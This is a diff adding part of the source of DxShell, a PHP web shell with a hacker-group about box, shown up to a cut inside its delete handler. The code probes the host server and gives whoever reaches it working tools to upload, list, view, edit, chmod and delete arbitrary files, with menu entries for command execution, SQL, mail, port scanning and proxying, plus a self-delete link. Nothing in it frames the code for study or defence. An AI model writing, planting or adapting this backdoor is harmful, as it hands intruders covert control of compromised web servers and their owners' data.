+h1				{font-size: 14pt; color: #00B000; background-color: #002000; font-family: Arial Black; font-weight: bold; text-align: center;}
+h2				{font-size: 12pt; color: #00B000; background-color: #002000; font-family: Courier New; text-align: center;}
+h3				{font-size: 12pt; color: #F0F000; background-color: #002000; font-family: Times New Roman; text-align: center;}
+caption			{font-size: 12pt; color: #00FF00; background-color: #000000; font-family: Times New Roman; text-align:center; border-width: 1pt 3pt 1pt 3pt;border-color:#FFFF00;border-style:solid solid dotted solid;padding: 5pt 0pt;}
+td.h2_oneline	{font-size: 12pt; color: #00B000; font-family: Courier New; text-align: center;background-color: #002000; border-right-color:#00FF00;border-right-width:1pt;border-right-style:solid;vertical-align:middle;}
+td.mode_header	{font-size: 16pt; color: #FFFF00; font-family: Courier New; text-align: center;background-color: #002000; vertical-align:middle;}
+table.outset, td.outset	  {border-width:3pt; border-style:outset; border-color: #004000;margin-top: 2pt;vertical-align:middle;}
+table.bord, td.bord, fieldset   {border-width:1pt; border-style:solid; border-color: #003000;vertical-align:middle;}
+hr   {border-width:1pt; border-style:solid; border-color: #005000; text-align: center; width: 90%;}
+textarea.bout 		{border-color: #000000; border-width:0pt; background: #000000; font: 12px verdana, arial, helvetica, sans-serif; color: #00FF00; Scrollbar-Face-color:#000000;Scrollbar-Track-Color: #000000;}
+td.listing	{background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:top;}
+td.linelisting  {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;}
+table.linelisting {border-color: #003000;border-width:0pt 1pt; border-style:solid;}
+td.js_floatwin_header {background-color:#003300;font-size:10pt;font-weight:bold;color:#FFFF00;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+td.js_floatwin_body	  {background-color:#000000;font-size:10pt;color:#00B000;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+font.rwx_sticky_bit {color:#FF0000;}
+.highlight_txt		{color: #FFFF00;}
+.achtung			{color: #000000; background-color: #FF0000; font-family: Arial Black; font-size: 14pt; padding:0pt 5pt;}
+
+input 			{font-size: 10pt;font-family: Arial; color: #E0E000; background-color: #000000; border-color:#00FF00 #005000 #005000 #FFFF00; border-width:1pt 1pt 1pt 3pt;border-style:dotted dotted dotted solid; padding-left: 3pt;overflow:hidden;}
+input.radio		{border-width:0pt;color: #FFFF00;}
+input.submit 	{font-size: 12pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #002000; border-color: #00FF00; border-width:0pt 1pt 1pt 0pt; border-style: solid; padding:1pt;letter-spacing:1pt;padding:0pt 2pt;}
+input.bt_Yes 	{font-size: 14pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #005000; border-color: #005000 #005000 #00FF00 #005000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_No 	{font-size: 14pt;font-family: Impact, Arial Black; color :#FF0000; background-color: #500000; border-color: #500000 #500000 #FF0000 #500000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_Yes:Hover 	{color:#000000; background-color:#00FF00;border-bottom-color:#FFFFFF;}
+input.bt_No:Hover 	{color:#000000; background-color:#FF0000;border-bottom-color:#FFFFFF;}
+textarea 		{color:#00FF00; background-color:#001000;border-color:#000000;border-width:0pt;border-style:solid;font-size:10pt;font-family:Arial;Padding:5pt;
+				Scrollbar-Face-Color: #00FF00; Scrollbar-Track-Color: #000500;
+				Scrollbar-Highlight-Color: #00A000;	Scrollbar-3dlight-Color: #00A000; Scrollbar-Shadow-Color: #005000;
+				Scrollbar-Darkshadow-Color: #005000;}
+select			{background-color:#001000;color:#00D000;border-color:#D0D000;border-width:1pt;border-style:solid dotted dotted solid;}
+
+A:Link, A:Visited { color: #00D000;	text-decoration: underline; }
+A.no:Link, A.no:Visited { color: #00D000;	text-decoration: none; }
+A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #00FF00; background-color:#003300; text-decoration: overline; }
+.Hover:Hover {color: #FFFF00; cursor:help;}
+.HoverClick:Hover {color: #FFFF00; cursor:crosshair;}
+span.margin		{margin: 0pt 10pt;}
+td.error {color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;}
+td.warning {color:#000000; background-color: #D00000; font-size: 11pt;}
+font.img_replacer {margin:1pt;padding:1pt;text-decoration: none;border-width:1pt;border-color:#D0D000;border-style:solid;}
+</style>
+
+<?php
+if (in_array($_GET['dxmode'], array('UPL', 'DIR', 'PRT')))
+	{  /* THIS FLOATING WINDOW IS ONLY SET FOR MODES: */?>
+<SCRIPT>
+var dom = document.getElementById?1:0;
+var ie4 = document.all && document.all.item;
+var opera = window.opera; //Opera
+var ie5 = dom && ie4 && !opera;
+var nn4 = document.layers;
+var nn6 = dom && !ie5 && !opera;
+var vers=parseInt(navigator.appVersion);
+var good_browser = (ie5 || ie4);
+function showwin(hdr,txt,w,vis)
+{
+if(good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	var temp =
+	"<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="+ w +">"
+	+((hdr!='')?("<TR><TD class=js_floatwin_header>"+ hdr + "</TD></TR>"):"")
+	+"<TR><TD class=js_floatwin_body>" + txt + "</TD></TR>"
+	+"</TABLE>";
+
+	if (vis == 1)
+		{
+		obj.innerHTML = temp;
+		obj.style.width = w;
+		hor = document.body.scrollWidth - obj.offsetWidth;
+		posHor = xOffset + evnt.clientX + 10;
+		posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+		posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+		if (posHor<hor)
+			obj.style.posLeft = posHor
+		else
+			obj.style.posLeft = posHor2;
+
+		obj.style.posTop = posVer;
+
+		obj.style.visibility = "visible";
+		}
+		else
+		{
+		obj.style.visibility = "hidden";
+		obj.style.posTop = 0;
+		obj.style.posLeft = 0;
+		}
+	}
+}
+function movewin()
+{
+if (good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	hor = document.body.scrollWidth - obj.offsetWidth;
+	posHor = xOffset + evnt.clientX + 10;
+	posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+	posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+	if (posHor<hor)
+		obj.style.posLeft = posHor
+		else
+		obj.style.posLeft = posHor2;
+
+	obj.style.posTop = posVer;
+	}
+}
+</SCRIPT>
+<?php } /* /END */?>
+
+</head>
+<body>
+<?php
+if ($DXGLOBALSHIT) /* tries to kill all the fucking bug.php pre-output, if ob_clean() failed */
+	{	print str_repeat("\n", 10).'<!--SHIT KILLER-->';
+	print "\n".'</body></a>'.str_repeat('</table>', 5).str_repeat('</div>', 5).str_repeat('</span>', 5).str_repeat('</pre>', 1).str_repeat('</font>', 5).str_repeat('</script>', 2);
+	print "\n".'<TABLE WIDTH=100% BORDER=0  style="position:absolute;z-index:100;top:0pt;left:0pt;width:100%;height:100%;"><tr><td>';
+	print "\n\n\n\n";
+	}
+?>
+
+<div id="js_floatwin" style="z-index:50;position:absolute;left:0;top:0;visibility:hidden"></div>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><a href="<?=DxURL('kill', '');?>&dxmode=WTF" class=no><h1>DxShell<br>v<?=$GLOB['SHELL']['Ver'];?></td>
+	<td>
+<?php
+print "\n".'<div style="margin-right:'.(  ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)?'100':'30'  ).'pt;">';
+print "\n".(  ($DXGLOBALSHIT)?'<font color=#FF0000><b>GLOBALSHIT</b></font> ; ':''  );
+print "\n".DxPrint_ParamState('php_ver', 		phpversion()						).' ; ';
+print "\n".DxPrint_ParamState('php_Safe_Mode', 	$GLOB['PHP']['SafeMode'], '!'		).' ; ';
+print "\n".DxPrint_ParamState('magic_quotes', 	(bool)get_magic_quotes_gpc(), '!'	).' ; ';
+print "\n".DxPrint_ParamState('gZip', 			function_exists('gzencode')			).' ; ';
+print "\n".DxPrint_ParamState('cURL', 			function_exists('curl_version')		).' ; ';
+print "\n".DxPrint_ParamState('MySQL', 			function_exists('mysql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('MsSQL', 			function_exists('mssql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('PostgreSQL', 	function_exists('pg_connect')		).' ; ';
+print "\n".DxPrint_ParamState('Oracle', 		function_exists('ocilogon')			).' ; ';
+print "\n".'Disabled functions: '.((($df=@ini_get('disable_functions'))=='')?'<font color=#00FF00><b>NONE</b></font>':'<font color=#FF0000><b>'.str_replace(array(',',';'), ', ', $df).'</b></font>');
+print "\n".'</div>';
+
+print "\n\n".'<span align=right style="position:absolute;z-index:1;right:0pt;top:0pt;"><table><tr><td class="h2_oneline"><nobr>';
+if ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)
+	print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=logoff" title="Log Off" class=no>[Exit]</a>';
+print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=DEL" title="Delete self ('.basename($_SERVER['PHP_SELF']).')" class=no><font color=#FF0000;>'.DxImg('del').'</font></a>';
+print "\n".'</nobr></td></tr></table></span>';
+
+print "\n\n".'<hr>';
+print "\n".'Disk free: <b>'.DxStr_FmtFileSize(disk_free_space($GLOB['FILES']['CurDIR'])).' / '.DxStr_FmtFileSize(disk_total_space($GLOB['FILES']['CurDIR'])).'</b> ; ';
+print "\n".'OS: <b>'.$GLOB['SYS']['OS']['id'].' ('.$GLOB['SYS']['OS']['Full'].' )</b> ; ';
+print "\n".'Yer_IP: <b>'.@$_SERVER['REMOTE_ADDR'].' ('.@$_SERVER['REMOTE_HOST'].')</b> ; ';
+print "\n".'<nobr>Own/U/G/Pid/Inode:<wbr><b>'.get_current_user().' / '.getmyuid().' / '.getmygid().' / '.getmypid().' / '.getmyinode().'</b> ; </nobr>';
+print "\n".'MySQL : <b>'.@mysql_get_server_info().'</b> ; ';
+print "\n".'<br>'.@$_SERVER['SERVER_SOFTWARE'];
+?>
+	</td>
+</table>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><h2>Modes</td>
+	<td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=DIR">DIR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=F_VIEW">VIEW</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=FTP<?=((!empty($_GET['dxdir']))?'&dxdir='.$_GET['dxdir']:'');?>">FTP</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('leave', 'dxsql_s,dxsql_l,dxsql_p,dxsql_d');?>&dxmode=SQL">SQL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PHP">PHP</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=COOK">COOKIE</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=CMD">CMD</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=MAIL">MAIL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=STR">STR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PRT">PORTSCAN</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=SOCK">SOCK</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PROX">PROXY</a>
+	</td>
+	</tr>
+</table>
+
+<?php $DX_Header_drawn=true; ?>
+
+<?php
+#################################################
+########
+########   DXGLOBALSHIT DOWNLOADER
+########
+if (isset($DxDOWNLOAD_File)) /* only when DXGLOBALSHIT is enabled */
+	{	print "\n".'<table align=center><tr><td class=mode_header><b>Download file</td></tr></table>';
+	print "\n".'The fact you see this means that "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit, so no headerz could be sent =((';
+	print "\n".'<br>Exclusively, DxShell is proud to present an additional way to download files...Just execute the php-script given below, and it will make the file u\'re trying to download';
+
+	if ($GLOB['SYS']['GZIP']['CanUse'])  $DxDOWNLOAD_File['content']=gzcompress($DxDOWNLOAD_File['content'], 6);
+
+	print "\n\n".'<br><br>';
+	print "\n".'<textarea rows=30 style="width:90%" align=center>';
+	print "\n".'<?php'."\n".' //Execute this, and you\'ll get the requested "'.$DxDOWNLOAD_File['filename'].'" in the same folder with the script ;)';
+	print "\n".'// The file is '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzcompress()ed and':''  ).' base64_encode()ed';
+	print "\n\n".'$encoded_file=\''.base64_encode($DxDOWNLOAD_File['content']).'\';';
+	print "\n\n\n\n";
+	print "\n".'$f=fopen(\''.$DxDOWNLOAD_File['filename'].'\', \'w\');';
+	print "\n".'fputs($f, '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzuncompress(base64_decode($encoded_file))':'base64_decode($encoded_file)'  ).');';
+	print "\n".'fclose($f);';
+	print "\n".'//Yahoo, hacker, the file is here =)';
+	print "\n".'?>';
+	print "\n".'</textarea>';
+	die();
+	}
+
+?>
+
+<table align=center>
+	<tr><td class=mode_header>
+	@MODE: <b><?=$GLOB['DxMODES'][$_GET['dxmode']];?>
+	</td></tr></table>
+<?
+
+########
+########   AboutBox
+########
+if ($_GET['dxmode']=='WTF')
+	{
+	?>
+<table align=center class=nooooneblya><tr><td><div align=center>
+<?php
+print '<a href="http://hellknights.void.ru/">'.DxImg('exec').'</a>';
+print '<br>o_O Tync, ICQ# 244-648';
+?><br><br>
+<textarea name="LolBox" class=bout style="width:500pt; height:500pt;"></textarea></table>
+<SCRIPT language=Javascript><!--
+var tl=new Array(
+"Kilobytes of c0de, litres of beer, kilometers of cigarettes (*no drugs*), and for what purpose?",
+"What's wrong with other shells?",
+"Usability, functionality, bugs?... NO.",
+"The main bug is: these shells ARE NOT mine =)",
+"Just like to be responsible for every motherfucking byte of code.",
+"Enjoy!",
+"-----------------------------------",
+"o_O Tync, http://hellknights.void.ru/, ICQ#244648",
+"DxShell v<?=$GLOB['SHELL']['Ver'].', date '.$GLOB['SHELL']['Date'];?>",
+"",
+"Greetz to: ",
+"iNfantry the Ruler",
+"Nik8 the Hekker",
+"_1nf3ct0r_ the Father",
+"Industry of Death the betatest0r =)",
+"",
+"Thanks to:",
+"Dunhill the cigarettes, Tuborg the beer, PHP the language, Nescafe the Coffee, Psychedelic the Music",
+"",
+"Wartime testers & debuggers ::: =))) :::",
+"MINDGROW",
+"",
+"",
+"Hekk da pl0net!",
+"--- EOF ---"
+);
+var speed=40;var index=0; text_pos=0;var str_length=tl[0].length;var contents, row;
+function type_text()
+{contents='';row=Math.max(0,index-50);
+while(row<index) contents += tl[row++] + '\r\n';
+document.getElementById("LolBox").value = contents + tl[index].substring(0,text_pos)+'|';
+if(text_pos++==str_length)
+	{text_pos=0;index++;
+	if(index!=tl.length)
+	{str_length=tl[index].length;setTimeout("type_text()",1000);
+	}
+	} else setTimeout("type_text()",speed);
+}type_text();
+//-->
+</SCRIPT>
+	<?php
+	}
+
+
+		###################################
+
+########
+########   Upload file
+########
+if ($_GET['dxmode']=='UPL')
+	{
+	if (empty($_POST['dxdir']) AND empty($_GET['dxdir'])) die(DxError('Uploading without selecting directory $_POST/$_GET[\'dxdir\'] is restricted'));
+
+	if (isset($_FILES['dx_uplfile']['tmp_name']))
+		{
+		$GETFILE=file_get_contents($_FILES['dx_uplfile']['tmp_name']);
+		DxFiles_UploadHere($_POST['DxFTP_FileTO'], $_FILES['dx_uplfile']['name'], $GETFILE);
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave','dxmode,dxsimple').'" enctype="multipart/form-data" method=POST>';
+		print "\n".'<input type="hidden" name="MAX_FILE_SIZE" value="'.$GLOB['PHP']['upload_max_filesize'].'">';
+		print "\n".'<font class="highlight_txt">Max: '.DxStr_FmtFileSize($GLOB['PHP']['upload_max_filesize']).'</font>';
+		print "\n".'<br><input type=text name="dxdir" value="'.$_GET['dxdir'].'" SIZE=50>';
+		print "\n".'<br><input type=file name="dx_uplfile" SIZE=50>';
+		print "\n".'<input type=submit value="Upload" class="submit"></form>';
+		}
+	}
+
+		###################################
+
+########
+########   Directory listings
+########
+if ($_GET['dxmode']=='DIR')
+	{
+	if (empty($_GET['dxdir'])) $_GET['dxdir']=realpath($GLOB['FILES']['CurDIR']);
+	$_GET['dxdir']=DxFileOkaySlashes($_GET['dxdir']);
+	if (substr($_GET['dxdir'], -1,1)!='/') $_GET['dxdir'].='/';
+
+	print "\n".'<br><form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+	DxGETinForm('leave', 'dxmode');
+	print "\n".'<input type=text name="dxdir" value="'.DxFileOkaySlashes(realpath($_GET['dxdir'])).'" SIZE=40>';
+	print "\n".'<input type=submit value="Goto" class="submit"></form>';
+
+	print "\n".'<br>'.'<b>&gt;&gt; <b>'.$_GET['dxdir'].'</b>';
+	if (!file_exists($_GET['dxdir'])) die(DxError('No such directory'));
+	if (!is_dir($_GET['dxdir'])) 	  die(DxError('It\'s a file!! What do you think about listing files in a file? =)) '));
+
+	if (isset($_GET['dxparam']))
+		{		if ($_GET['dxparam']=='mkDIR')  if (	!mkdir($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkDir. Perms?');
+		if ($_GET['dxparam']=='mkFILE') if (	!touch($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkFile. Perms?');
+		}
+
+	if (!($dir_ptr=opendir($_GET['dxdir']))) die(DxError('Unable to open dir for reading. Perms?...'));
+	$FILES=array('DIRS' => array(), 'FILES' => array());
+	while (!is_bool( $file = readdir($dir_ptr)  ) )
+		if (($file!='.') and ($file!='..'))		if (is_dir($_GET['dxdir'].$file)) $FILES['DIRS'][]=$file; else $FILES['FILES'][]=$file;
+	asort($FILES['DIRS']);asort($FILES['FILES']);
+
+	print "\n".'<span style="position:absolute;right:0pt;">';
+	if (isset($_GET['dxdirsimple']))	print '<a href="'.DxURL('kill', 'dxdirsimple').'">[Switch to FULL]</a>';
+		else					print '<a href="'.DxURL('leave', '').'&dxdirsimple=1">[Switch to LITE]</a>';
+	print '</span>';
+
+	$folderup_link=explode('/',$_GET['dxdir'].'../');
+	if (!empty($folderup_link[   count($folderup_link)-3   ]) AND ($folderup_link[   count($folderup_link)-3   ]!='..'))
+		unset($folderup_link[   count($folderup_link)-3   ], $folderup_link[   count($folderup_link)-1   ]);
+	$folderup_link=implode('/', $folderup_link);
+	print "\n".str_repeat('&nbsp;',3).'<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.$folderup_link.'" class=no>'
+						.DxImg('foldup').' ../</a>';
+
+	print "\n".str_repeat('&nbsp;', 15).'<font class=highlight_txt>MAKE: </font>'
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkDIR">Dir</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkFILE">File</a>'
+		.' / '.str_repeat('&nbsp;',5)
+		.'<font class=highlight_txt>UPLOAD: </font>'
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">Form</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">FTP</a>'
+		;
+
+	print "\n".'<br>'.count($FILES['DIRS']).' dirs, '.count($FILES['FILES']).' files ';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 ><COL span=15 class="linelisting">';
+	for ($NOWi=0;$NOWi<=1;$NOWi++)
+		for ($NOW=($NOWi==0)?'DIRS':'FILES', $i=0;$i<count($FILES[$NOW]);$i++)
+			{			$cur=&$FILES[$NOW][$i];
+			$dircur=$_GET['dxdir'].$cur;
+			print "\n".'<tr>';
+			print "\n\t".'<td class=linelisting '.((isset($_GET['dxdirsimple']) AND ($NOW=='DIRS'))?'colspan=2':'').'>'
+							.(($NOW=='DIRS')?DxImg('folder').' '
+							.				 '<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.DxFileToUrl($dircur).'" class=no>':'')
+							.(($NOW=='FILES')?'<a href="'.DxURL('kill', '').'&dxmode=F_VIEW&dxfile='.DxFileToUrl($dircur).'" class=no>':'')
+							.htmlspecialchars($cur).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				print "\n\t".'<td class=linelisting>'
+					.'<span '.DxDesign_DrawBubbleBox('File Info',    '<b>Create time:</b><br>'.DxDate(@filectime($dircur)).'<br>'
+															 		.'<b>Modify time:</b><br>'. DxDate(@filemtime($dircur)).'<br>'
+															 		.'<b>Owner/Group:</b><br>'.(@fileowner($dircur)).' / '.(@filegroup($dircur))
+															 		, 150).' class=Hover><b>INFO</span> </td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=2':'').'>'
+					.((($i+$NOWi)==0)?'<span '.DxDesign_DrawBubbleBox('Perms legend', '1st: sticky bit:<br>"<b>S</b>" Socket, "<b>L</b>" Symbolic Link, "<b>&lt;empty&gt;</b>" Regular, "<b>B</b>" Block special, "<b>D</b>" Directory, "<b>C</b>" Character special, "<b>P</b>" FIFO Pipe, "<b>?</b>" Unknown<br>Others: Owner/Group/World<br>"<b>r</b>" Read, "<b>w</b>" Write, "<b>x</b>" Execute<br><br><b>Click to CHMOD', 400).' class=Hover>':'')
+					.'<a href="'.DxURL('kill', '').'&dxmode=F_CHM&dxfile='.DxFileToUrl($dircur).'" class=no>'.DxChmod_Oct2Str(@fileperms($dircur)).'</td>';
+				}
+
+			if ($NOW!='DIRS') print "\n\t".'<td class=linelisting style="text-align:right;">'.DxStr_FmtFileSize(@filesize($dircur)).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				if ($NOW=='DIRS') print "\n\t".'<td class=linelisting colspan='.(($GLOB['SYS']['GZIP']['IMG'])?'4':'3').'>&nbsp;</td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($dircur).'" target=_blank>'.DxImg('view').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($dircur).'">'.DxImg('ed').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('downl').'</a></td>';
+				if (($NOW!='DIRS') AND ($GLOB['SYS']['GZIP']['IMG'])) print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dx_gzip=Yeah&dxfile='.DxFileToUrl($dircur).'">'.DxImg('gzip').'</a></td>';
+				print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_REN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('rename').'</a></td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=3':'').'><a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($dircur).'">'.DxImg('del').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_COP&dxfile='.DxFileToUrl($dircur).'">'.DxImg('copy').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_MOV&dxfile='.DxFileToUrl($dircur).'">'.DxImg('move').'</a></td>';
+				}
+			print "\n\t".'</tr>';
+			}
+	print "\n".'</table>';
+	}
+
+
+########
+########   File Global Actions
+########
+if ('F_'==substr($_GET['dxmode'],0,2))
+	{	if (empty($_GET['dxfile']))
+		{		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=text name="dxfile" value="" style="width:70%;">';
+		print "\n".'<br><input type=submit value="Select" class="submit">';
+		print "\n".'</form>';
+		}
+	if (!file_exists(@$_GET['dxfile']))  die(DxError('No such file'));
+	print "\n\n".'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+########
+########   File CHMOD
+########
+if ($_GET['dxmode']=='F_CHM')
+	{
+	if (isset($_GET['dxparam']))
+		{		if (chmod($_GET['dxfile'], octdec((int)$_GET['dxparam']))==FALSE)
+			print DxError('Chmod "'.$_GET['dxfile'].'" failed');
+			else print 'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</b></font> )...<b>OK</b>';
+		}
+		else
+		{		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</font> )';
+		print "\n".'<br><input type=text name="dxparam" value="'.
+			//decoct(fileperms($_GET['dxfile']))
+			substr(sprintf('%o', fileperms($_GET['dxfile'])), -4)
+			.'">';
+		print "\n".'<input type=submit value="chmod" class="submit"></form>';
+		}
+	}
+
+########
+########   File View
+########
+if ($_GET['dxmode']=='F_VIEW')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=right><tr>';
+	print "\n".'<td><h3>'.$_GET['dxfile'].'</h3></td>';
+	print "\n".'<td>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'" target=_blank>'.DxImg('view').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('ed').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('downl').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('del').'</a>'
+		.'</td>';
+	print "\n".'</tr></table><br>';
+	print "\n".'Tip: to view the file "as is" - open the page in <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'">source</a> (<i>works best in Opera</i>), or <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">download</a> this file';
+
+	print "\n\n\n".'<br><hr><!-- File contents goes from here -->'."\n";
+	print "\n".'<plaintext>';
+	print file_get_contents($_GET['dxfile']);
+	die(); /* Plaintext is infinite */
+	}
+
+########
+########   File Edit
+########
+if ($_GET['dxmode']=='F_ED')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (isset($_POST['dxparam']))
+		{		if (!is_writable($_GET['dxfile']))  die(DxError('File is not writable. Perms?...'));
+		if (($f=fopen($_GET['dxfile'], 'w'))===FALSE) die(DxError('File open for WRITE failed'));
+		if (fputs($f, $_POST['dxparam'])===FALSE)	die(DxError('I/O: File write failed'));
+		fclose($f);
+		print 'File saved OK;';
+		}
+		else
+		{
+		if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');		print "\n".'<font class=highlight_txt>'.$_GET['dxfile'].'</font>';
+		print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+		print "\n".'<textarea name="dxparam" rows=30 style="width:90%;">'.str_replace(array('<','>'),array('&lt;','&gt;'), file_get_contents($_GET['dxfile'])).'</textarea>';
+		print "\n".'<br><input type=submit value="Save" style="width:100pt;height:50pt;font-size:15pt;" class=submit>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Delete
+########
+if ($_GET['dxmode']=='F_DEL')
+	{		if (isset($_GET['dx_ok']))
+			{		if ($_GET['dx_ok']=='Yes')
+			{			if (	(is_file($_GET['dxfile']) AND !unlink($_GET['dxfile']))  OR  (is_dir($_GET['dxfile']) AND !rmdir($_GET['dxfile']))		)
+				print DxError('Unable to delete file. Perms?...<br>');
+				else
+				{				print "\n".'Delete( <font class=highlight_txt>'.$_GET['dxfile'].'</font> ) <b>OK</b>';
+				DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+				}
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><tr><td>'
